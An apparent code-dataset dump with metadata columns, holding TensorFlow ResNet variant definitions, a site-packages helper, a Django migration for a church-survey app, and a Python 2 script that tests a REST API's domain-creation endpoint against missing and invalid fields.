| 0.91
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3944bbbbbc8805a7a3ab322c04a733ba1d0fdf1c
| 8,340
|
py
|
Python
|
custom_resnet.py
|
Shirhe-Lyh/mask_rcnn_customized
|
bf4b7393a59e35e8d8347ff6ce57a78150ed722c
|
[
"Apache-2.0"
] | 10
|
2019-01-25T05:18:52.000Z
|
2022-03-24T01:50:27.000Z
|
custom_resnet.py
|
Shirhe-Lyh/mask_rcnn_customized
|
bf4b7393a59e35e8d8347ff6ce57a78150ed722c
|
[
"Apache-2.0"
] | null | null | null |
custom_resnet.py
|
Shirhe-Lyh/mask_rcnn_customized
|
bf4b7393a59e35e8d8347ff6ce57a78150ed722c
|
[
"Apache-2.0"
] | 1
|
2020-04-23T02:25:53.000Z
|
2020-04-23T02:25:53.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 27 09:48:59 2018
@author: shirhe-lyh
"""
from tensorflow.contrib.slim import nets
resnet_v1_block = nets.resnet_v1.resnet_v1_block
resnet_v2_block = nets.resnet_v2.resnet_v2_block
def resnet_v1_17(inputs,
num_classes=None,
is_training=True,
global_pool=True,
output_stride=None,
reuse=None,
scope='resnet_v1_17'):
"""ResNet-17 model. See resnet_v1() for arg and return description.
Args:
inputs: A tensor of size [batch, height_in, width_in, channels].
num_classes: Number of predicted classes for classification tasks.
If 0 or None, we return the features before the logit layer.
is_training: whether batch_norm layers are in training mode. If this
is set to None, the callers can specify slim.batch_norm's
is_training parameter from an outer slim.arg_scope.
global_pool: If True, we perform global average pooling before
computing the logits. Set to True for image classification, False
for dense prediction.
output_stride: If None, then the output will be computed at the nominal
network stride. If output_stride is not None, it specifies the
requested ratio of input to output spatial resolution.
reuse: whether or not the network and its variables should be reused.
To be able to reuse 'scope' must be given.
scope: Optional variable_scope.
Returns:
net: A rank-4 tensor of size [batch, height_out, width_out,
channels_out]. If global_pool is False, then height_out and
width_out are reduced by a factor of output_stride compared to
the respective height_in and width_in, else both height_out and
width_out equal one. If num_classes is 0 or None, then net is
the output of the last ResNet block, potentially after global
average pooling. If num_classes a non-zero integer, net contains
the pre-softmax activations.
end_points: A dictionary from components of the network to the
corresponding activation.
Raises:
ValueError: If the target output_stride is not valid.
"""
blocks = [
resnet_v1_block('block1', base_depth=64, num_units=1, stride=2),
resnet_v1_block('block2', base_depth=128, num_units=1, stride=2),
resnet_v1_block('block3', base_depth=256, num_units=2, stride=2),
resnet_v1_block('block4', base_depth=512, num_units=1, stride=1)
]
return nets.resnet_v1.resnet_v1(
inputs,
blocks,
num_classes,
is_training,
global_pool=global_pool,
output_stride=output_stride,
reuse=reuse,
scope=scope)
def resnet_v1_20(inputs,
num_classes=None,
is_training=True,
global_pool=True,
output_stride=None,
spatial_squeeze=True,
store_non_strided_activations=False,
reuse=None,
scope='resnet_v1_20'):
"""ResNet-20 model. See resnet_v1() for arg and return description."""
blocks = [
resnet_v1_block('block1', base_depth=64, num_units=1, stride=2),
resnet_v1_block('block2', base_depth=128, num_units=1, stride=2),
resnet_v1_block('block3', base_depth=256, num_units=1, stride=2),
resnet_v1_block('block4', base_depth=512, num_units=3, stride=1)
]
return nets.resnet_v1.resnet_v1(
inputs,
blocks,
num_classes,
is_training,
global_pool=global_pool,
output_stride=output_stride,
include_root_block=True,
reuse=reuse,
scope=scope)
def resnet_v2_14(inputs,
num_classes=None,
is_training=True,
global_pool=True,
output_stride=None,
reuse=None,
scope='resnet_v2_14'):
"""ResNet-14 model. See resnet_v2() for arg and return description.
Args:
inputs: A tensor of size [batch, height_in, width_in, channels].
num_classes: Number of predicted classes for classification tasks.
If None we return the features before the logit layer.
is_training: whether batch_norm layers are in training mode.
global_pool: If True, we perform global average pooling before
computing the logits. Set to True for image classification,
False for dense prediction.
output_stride: If None, then the output will be computed at the
nominal network stride. If output_stride is not None, it specifies
the requested ratio of input to output spatial resolution.
reuse: whether or not the network and its variables should be reused.
To be able to reuse 'scope' must be given.
scope: Optional variable_scope.
Returns:
net: A rank-4 tensor of size [batch, height_out, width_out,
channels_out]. If global_pool is False, then height_out and
width_out are reduced by a factor of output_stride compared to the
respective height_in and width_in, else both height_out and
width_out equal one. If num_classes is None, then net is the
output of the last ResNet block, potentially after global average
pooling. If num_classes is not None, net contains the pre-softmax
activations.
end_points: A dictionary from components of the network to the
corresponding activation.
Raises:
ValueError: If the target output_stride is not valid.
"""
blocks = [
resnet_v2_block('block1', base_depth=64, num_units=1, stride=2),
resnet_v2_block('block2', base_depth=128, num_units=1, stride=2),
resnet_v2_block('block3', base_depth=256, num_units=1, stride=2),
resnet_v2_block('block4', base_depth=512, num_units=1, stride=1)
]
return nets.resnet_v2.resnet_v2(
inputs,
blocks,
num_classes,
is_training,
global_pool,
output_stride,
include_root_block=True,
reuse=reuse,
scope=scope)
def resnet_v2_17(inputs,
num_classes=None,
is_training=True,
global_pool=True,
output_stride=None,
reuse=None,
scope='resnet_v2_17'):
"""ResNet-17 model. See resnet_v2() for arg and return description."""
blocks = [
resnet_v2_block('block1', base_depth=64, num_units=1, stride=2),
resnet_v2_block('block2', base_depth=128, num_units=1, stride=2),
resnet_v2_block('block3', base_depth=256, num_units=2, stride=2),
resnet_v2_block('block4', base_depth=512, num_units=1, stride=1)
]
return nets.resnet_v2.resnet_v2(
inputs,
blocks,
num_classes,
is_training,
global_pool,
output_stride,
include_root_block=True,
reuse=reuse,
scope=scope)
def resnet_v2_20(inputs,
num_classes=None,
is_training=True,
global_pool=True,
output_stride=None,
reuse=None,
                 scope='resnet_v2_20'):
    """ResNet-20 model. See resnet_v2() for arg and return description."""
blocks = [
resnet_v2_block('block1', base_depth=64, num_units=1, stride=2),
resnet_v2_block('block2', base_depth=128, num_units=2, stride=2),
resnet_v2_block('block3', base_depth=256, num_units=2, stride=2),
resnet_v2_block('block4', base_depth=512, num_units=1, stride=1)
]
return nets.resnet_v2.resnet_v2(
inputs,
blocks,
num_classes,
is_training,
global_pool,
output_stride,
include_root_block=True,
reuse=reuse,
scope=scope)
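These constructors are thin wrappers around slim's resnet_v1/resnet_v2 builders, so usage mirrors the stock depths. A hedged sketch, assuming a TensorFlow 1.x environment where tf.contrib.slim is importable (the placeholder shape and class count are illustrative):

import tensorflow as tf  # TensorFlow 1.x

images = tf.placeholder(tf.float32, [None, 224, 224, 3])
# Returns pre-softmax activations plus a dict of intermediate endpoints,
# exactly as described in the docstrings above.
net, end_points = resnet_v1_17(images, num_classes=10, is_training=True)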
| 40.289855
| 80
| 0.604436
| 1,070
| 8,340
| 4.494393
| 0.162617
| 0.049906
| 0.028072
| 0.046787
| 0.931171
| 0.917862
| 0.909753
| 0.909753
| 0.909545
| 0.894157
| 0
| 0.037813
| 0.32458
| 8,340
| 206
| 81
| 40.485437
| 0.815906
| 0.432974
| 0
| 0.798319
| 0
| 0
| 0.042533
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042017
| false
| 0
| 0.008403
| 0
| 0.092437
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
46bba2828f16626ba194e30638fd1040710afbe0
| 98
|
py
|
Python
|
pystatic/sitepkg.py
|
pystatic/pystatic
|
e93d372e46adf8a8f697a71b80f3c88d26272607
|
[
"MIT"
] | null | null | null |
pystatic/sitepkg.py
|
pystatic/pystatic
|
e93d372e46adf8a8f697a71b80f3c88d26272607
|
[
"MIT"
] | null | null | null |
pystatic/sitepkg.py
|
pystatic/pystatic
|
e93d372e46adf8a8f697a71b80f3c88d26272607
|
[
"MIT"
] | null | null | null |
import site
def get_sitepkg():
return [site.getusersitepackages()] + site.getsitepackages()
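A trivial check of what the helper returns on the current interpreter (illustrative only):

if __name__ == "__main__":
    # Prints the user site-packages directory followed by the global ones.
    print(get_sitepkg())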
| 16.333333
| 64
| 0.734694
| 10
| 98
| 7.1
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 98
| 5
| 65
| 19.6
| 0.845238
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
46ca9d8d86a96cdde4cddd1edf881fe558073040
| 11,763
|
py
|
Python
|
biserici_inlemnite/biserici/migrations/0024_auto_20210803_1534.py
|
ck-tm/biserici-inlemnite
|
c9d12127b92f25d3ab2fcc7b4c386419fe308a4e
|
[
"MIT"
] | null | null | null |
biserici_inlemnite/biserici/migrations/0024_auto_20210803_1534.py
|
ck-tm/biserici-inlemnite
|
c9d12127b92f25d3ab2fcc7b4c386419fe308a4e
|
[
"MIT"
] | null | null | null |
biserici_inlemnite/biserici/migrations/0024_auto_20210803_1534.py
|
ck-tm/biserici-inlemnite
|
c9d12127b92f25d3ab2fcc7b4c386419fe308a4e
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.1.13 on 2021-08-03 12:34
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('biserici', '0023_auto_20210731_2005'),
]
operations = [
migrations.AlterModelOptions(
name='biserica',
options={'ordering': ['the_order'], 'verbose_name_plural': ' Biserici'},
),
migrations.AlterModelOptions(
name='componentaartistica',
options={'ordering': ['biserica__the_order'], 'verbose_name_plural': '3.3 Componenta Artistică'},
),
migrations.AlterModelOptions(
name='conservare',
options={'ordering': ['biserica__the_order'], 'verbose_name_plural': '5. Stare de conservare'},
),
migrations.AlterModelOptions(
name='descriere',
options={'ordering': ['biserica__the_order'], 'verbose_name_plural': '3. Descriere'},
),
migrations.AlterModelOptions(
name='finisaj',
options={'ordering': ['biserica__the_order'], 'verbose_name_plural': '3.2 Finisaje'},
),
migrations.AlterModelOptions(
name='fotografii',
options={'ordering': ['biserica__the_order'], 'verbose_name_plural': '3.1 Fotografii'},
),
migrations.AlterModelOptions(
name='identificare',
options={'ordering': ['biserica__the_order'], 'verbose_name_plural': '1. Identificare'},
),
migrations.AlterModelOptions(
name='istoric',
options={'ordering': ['biserica__the_order'], 'verbose_name_plural': '2. Istoric'},
),
migrations.AlterModelOptions(
name='patrimoniu',
options={'ordering': ['biserica__the_order'], 'verbose_name_plural': '4. Valoare Patrimoniu Cultural'},
),
migrations.AddField(
model_name='historicalidentificare',
name='adresa',
field=models.CharField(blank=True, max_length=250, null=True),
),
migrations.AddField(
model_name='identificare',
name='adresa',
field=models.CharField(blank=True, max_length=250, null=True),
),
migrations.AlterField(
model_name='conservare',
name='stare_bolti',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='stare_cimitir',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='stare_corp_biserica',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='stare_elemente_arhitecturale',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='stare_finisaj_peste_corp',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='stare_finisaj_tambur_turn',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='stare_fundatii',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='stare_icoane_istorice',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='stare_invelitoare',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='stare_monumente_funerare_valoroase',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='stare_pardoseli_interioare',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='stare_picturi_exterioare',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='stare_picturi_interioare',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='stare_sarpanta_peste_corp_biserica',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='stare_structura_turn',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='stare_teren',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='stare_usi_si_ferestre',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='starea_mobilier',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='starea_obiecte_de_cult',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='vegetatie_invaziva',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='stare_bolti',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='stare_cimitir',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='stare_corp_biserica',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='stare_elemente_arhitecturale',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='stare_finisaj_peste_corp',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='stare_finisaj_tambur_turn',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='stare_fundatii',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='stare_icoane_istorice',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='stare_invelitoare',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='stare_monumente_funerare_valoroase',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='stare_pardoseli_interioare',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='stare_picturi_exterioare',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='stare_picturi_interioare',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='stare_sarpanta_peste_corp_biserica',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='stare_structura_turn',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='stare_teren',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='stare_usi_si_ferestre',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='starea_mobilier',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='starea_obiecte_de_cult',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='vegetatie_invaziva',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
]
| 45.242308
| 115
| 0.545014
| 1,275
| 11,763
| 4.894902
| 0.078431
| 0.060567
| 0.11825
| 0.179458
| 0.88175
| 0.877744
| 0.877744
| 0.877744
| 0.84698
| 0.810928
| 0
| 0.053237
| 0.283006
| 11,763
| 259
| 116
| 45.416988
| 0.686744
| 0.003911
| 0
| 0.893281
| 1
| 0
| 0.184635
| 0.052155
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.003953
| 0
| 0.01581
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
201627f8073133f5a5b8f15dbf7b50ae06f42345
| 11,093
|
py
|
Python
|
testcases/test_2_create_domain.py
|
evilbrave/REST_API_TESTCASES
|
dccfddf2030adbf8188e0e7bf6dbfa4fa581a420
|
[
"MIT"
] | 1
|
2018-08-07T21:53:52.000Z
|
2018-08-07T21:53:52.000Z
|
testcases/test_2_create_domain.py
|
evilbrave/REST_API_TESTCASES
|
dccfddf2030adbf8188e0e7bf6dbfa4fa581a420
|
[
"MIT"
] | null | null | null |
testcases/test_2_create_domain.py
|
evilbrave/REST_API_TESTCASES
|
dccfddf2030adbf8188e0e7bf6dbfa4fa581a420
|
[
"MIT"
] | 1
|
2019-01-31T13:57:34.000Z
|
2019-01-31T13:57:34.000Z
|
import requests
import common_data
from signature import Signature
import test_1_device_auth
import time
url = common_data.oss_url
#url = "http://127.0.0.1:8888"
path = "/v1/domains"
test_time = time.time()
def init_headers(headers):
headers['Content-Type'] = common_data.content_type
headers['X-Api-Key'] = common_data.x_api_key
headers['X-Signature'] = ""
return headers
def init_body_content(body_content):
body_content['certificate_serial'] = common_data.certificate_serial
body_content['access_token'] = ""
body_content['domain'] = "TEST_DOMAIN_"+str(test_time)
body_content['domain'] = "TEST_DOMAIN"
return body_content
def testcase_0(headers, body_content):
headers = headers.copy()
body_content = body_content.copy()
concat_text = common_data.get_concat_text(body_content)
signature = Signature()
signature.load_key(common_data.certificate_serial)
signed_signature = signature.sign(concat_text)
headers['X-Signature'] = signed_signature
response = requests.post(url + path, data=body_content, headers=headers)
if response.status_code == 200 :
print "TEST CASE 0 OK"
else:
print "TEST CASE 0 FAILED"
print response.status_code
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_1(headers, body_content):
headers = headers.copy()
body_content = body_content.copy()
headers.pop('Content-Type')
concat_text = common_data.get_concat_text(body_content)
signature = Signature()
signature.load_key(common_data.certificate_serial)
signed_signature = signature.sign(concat_text)
headers['X-Signature'] = signed_signature
response = requests.post(url + path, data=body_content, headers=headers)
if response.status_code == 400 and response.json()['code'] == "400.23":
print "TEST CASE 1 OK!"
else:
print "TEST CASE 1 FAILED!"
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_2(headers, body_content):
headers = headers.copy()
body_content = body_content.copy()
headers.pop('X-Signature')
response = requests.post(url + path, data=body_content, headers=headers)
if response.status_code == 400 and response.json()['code'] == "400.0":
print "TEST CASE 2 OK!"
else:
print "TEST CASE 2 FAILED!"
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_3(headers, body_content):
headers = headers.copy()
body_content = body_content.copy()
headers.pop('X-Api-Key')
concat_text = common_data.get_concat_text(body_content)
signature = Signature()
signature.load_key(common_data.certificate_serial)
signed_signature = signature.sign(concat_text)
headers['X-Signature'] = signed_signature
response = requests.post(url + path, data=body_content, headers=headers)
if response.status_code == 403:# and response.json()['code'] == "400.0":
print "TEST CASE 3 OK!"
else:
print response.status_code
print "TEST CASE 3 FAILED!"
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_4(headers, body_content):
headers = headers.copy()
body_content = body_content.copy()
body_content.pop('certificate_serial')
concat_text = common_data.get_concat_text(body_content)
signature = Signature()
signature.load_key(common_data.certificate_serial)
signed_signature = signature.sign(concat_text)
headers['X-Signature'] = signed_signature
response = requests.post(url + path, data=body_content, headers=headers)
if response.status_code == 400 and response.json()['code'] == "400.2":
print "TEST CASE 4 OK!"
else:
print "TEST CASE 4 FAILED!"
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_5(headers, body_content):
headers = headers.copy()
body_content = body_content.copy()
body_content.pop('access_token')
concat_text = common_data.get_concat_text(body_content)
signature = Signature()
signature.load_key(common_data.certificate_serial)
signed_signature = signature.sign(concat_text)
headers['X-Signature'] = signed_signature
response = requests.post(url + path, data=body_content, headers=headers)
if response.status_code == 400 and response.json()['code'] == "400.6":
print "TEST CASE 5 OK!"
else:
print "TEST CASE 5 FAILED!"
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_6(headers, body_content):
headers = headers.copy()
body_content = body_content.copy()
body_content.pop('domain')
concat_text = common_data.get_concat_text(body_content)
signature = Signature()
signature.load_key(common_data.certificate_serial)
signed_signature = signature.sign(concat_text)
headers['X-Signature'] = signed_signature
response = requests.post(url + path, data=body_content, headers=headers)
if response.status_code == 400 and response.json()['code'] == "400.7":
print "TEST CASE 6 OK!"
else:
print "TEST CASE 6 FAILED!"
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_7(headers, body_content):
headers = headers.copy()
body_content = body_content.copy()
headers['Content-Type'] = "INVALID_CONTENT_TYPE"
concat_text = common_data.get_concat_text(body_content)
signature = Signature()
signature.load_key(common_data.certificate_serial)
signed_signature = signature.sign(concat_text)
headers['X-Signature'] = signed_signature
response = requests.post(url + path, data=body_content, headers=headers)
if response.status_code == 400 and response.json()['code'] == "400.19":
print "TEST CASE 7 OK!"
else:
print response.status_code
print "TEST CASE 7 FAILED!"
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_8(headers, body_content):
headers = headers.copy()
body_content = body_content.copy()
headers['X-Signature'] = "INVALID_X_SIGNATURE"
response = requests.post(url + path, data=body_content, headers=headers)
if response.status_code == 400 and response.json()['code'] == "400.1":
print "TEST CASE 8 OK!"
else:
print response.status_code
print "TEST CASE 8 FAILED!"
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_9(headers, body_content):
headers = headers.copy()
body_content = body_content.copy()
headers['X-Api-Key'] = "INVALID_X_API_KEY"
concat_text = common_data.get_concat_text(body_content)
signature = Signature()
signature.load_key(common_data.certificate_serial)
signed_signature = signature.sign(concat_text)
headers['X-Signature'] = signed_signature
response = requests.post(url + path, data=body_content, headers=headers)
if response.status_code == 400:# and response.json()['code'] == "400.1":
print "TEST CASE 9 OK!"
else:
print response.status_code
print "TEST CASE 9 FAILED!"
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_10(headers, body_content):
headers = headers.copy()
body_content = body_content.copy()
body_content['certificate_serial'] = "INVALID_CERTIFICATE_SERIAL"
concat_text = common_data.get_concat_text(body_content)
signature = Signature()
signature.load_key(common_data.certificate_serial)
signed_signature = signature.sign(concat_text)
headers['X-Signature'] = signed_signature
response = requests.post(url + path, data=body_content, headers=headers)
if response.status_code == 400 and response.json()['code'] == "400.3":
print "TEST CASE 10 OK!"
else:
print response.status_code
print "TEST CASE 10 FAILED!"
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_11(headers, body_content):
headers = headers.copy()
body_content = body_content.copy()
body_content['access_token'] = "INVALID_ACCESS_TOKEN"
concat_text = common_data.get_concat_text(body_content)
signature = Signature()
signature.load_key(common_data.certificate_serial)
signed_signature = signature.sign(concat_text)
headers['X-Signature'] = signed_signature
response = requests.post(url + path, data=body_content, headers=headers)
if response.status_code == 400 and response.json()['code'] == "401.0":
print "TEST CASE 11 OK!"
else:
print response.status_code
print "TEST CASE 11 FAILED!"
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_12(headers, body_content):
headers = headers.copy()
body_content = body_content.copy()
body_content['domain'] = "INVALID_DOMAIN!"
concat_text = common_data.get_concat_text(body_content)
signature = Signature()
signature.load_key(common_data.certificate_serial)
signed_signature = signature.sign(concat_text)
headers['X-Signature'] = signed_signature
response = requests.post(url + path, data=body_content, headers=headers)
if response.status_code == 400 and response.json()['code'] == "400.8":
print "TEST CASE 12 OK!"
else:
print response.status_code
print "TEST CASE 12 FAILED!"
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
if __name__ == '__main__':
# set headers
headers = dict()
headers = init_headers(headers)
# set body
body_content = dict()
init_body_content(body_content)
sso_tokens = test_1_device_auth.get_device_authentication_token()
if sso_tokens.has_key('access_token') and sso_tokens.has_key('refresh_token'):
body_content['access_token'] = sso_tokens['access_token']
else:
print "[Error] init access token failed!"
exit(-1)
testcase_0(headers, body_content)
# testcase_1(headers, body_content)
# testcase_2(headers, body_content)
# testcase_3(headers, body_content)
# testcase_4(headers, body_content)
# testcase_5(headers, body_content)
# testcase_6(headers, body_content)
# testcase_7(headers, body_content)
# testcase_8(headers, body_content)
# testcase_9(headers, body_content)
# testcase_10(headers, body_content)
# testcase_11(headers, body_content)
# testcase_12(headers, body_content)
#test_create_domain(access_token['access_token'], new_domain)
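The file is Python 2 only (print statements, dict.has_key). A hedged Python 3 rendering of a single case, assuming the same module-level url, path, common_data and Signature helpers, would look like this:

def testcase_0_py3(headers, body_content):
    headers = headers.copy()
    body_content = body_content.copy()
    concat_text = common_data.get_concat_text(body_content)
    signature = Signature()
    signature.load_key(common_data.certificate_serial)
    headers['X-Signature'] = signature.sign(concat_text)
    response = requests.post(url + path, data=body_content, headers=headers)
    if response.status_code == 200:
        print("TEST CASE 0 OK")
    else:
        print("TEST CASE 0 FAILED", response.status_code)
        print("HTTP Header:", headers)
        print("HTTP Body:", body_content)
        print(response.text)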
| 33.113433
| 82
| 0.689444
| 1,421
| 11,093
| 5.148487
| 0.062632
| 0.159377
| 0.063969
| 0.088846
| 0.866184
| 0.781301
| 0.781301
| 0.781301
| 0.781301
| 0.734281
| 0
| 0.018785
| 0.198594
| 11,093
| 335
| 83
| 33.113433
| 0.804162
| 0.054178
| 0
| 0.62249
| 0
| 0
| 0.13327
| 0.002482
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.02008
| null | null | 0.297189
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
203ac4402738cf44045d932de888afb0b0b6964c
| 4,629
|
py
|
Python
|
submissions/converter.tests.py
|
